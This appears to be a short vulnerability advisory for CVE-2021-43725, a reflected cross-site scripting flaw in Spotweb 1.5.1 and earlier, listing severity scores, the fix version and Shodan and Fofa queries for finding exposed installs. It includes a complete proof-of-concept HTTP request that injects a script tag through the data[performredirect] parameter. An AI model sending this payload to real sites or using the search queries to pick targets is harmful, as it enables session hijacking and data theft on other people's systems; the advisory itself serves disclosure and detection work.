| Title | Spotweb <= 1.5.1 - Cross Site Scripting (Reflected) |
|---|---|
| Author | theamanrawat |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, data theft, or other attacks. |
| Remediation | Fixed in version 1.5.2 |
| CVSS Score | 6.1 |
| EPSS Score | 0.01081 |
| CVE ID | CVE-2021-43725 |
| CWE ID | CWE-79 |
| Shodan Query | title:"SpotWeb - overview"http.title:"spotweb - overview" |
| Fofa Query | title="spotweb - overview" |
| Tags | cve cve2021 xss spotweb unauth spotweb_project vuln |
There is a Cross Site Scripting (XSS) vulnerability in SpotPage_login.php of Spotweb 1.5.1 and below, which allows remote attackers to inject arbitrary web script or HTML via the data[performredirect] parameter.
GET /?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-43725.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-43725.pcap
N/AN/A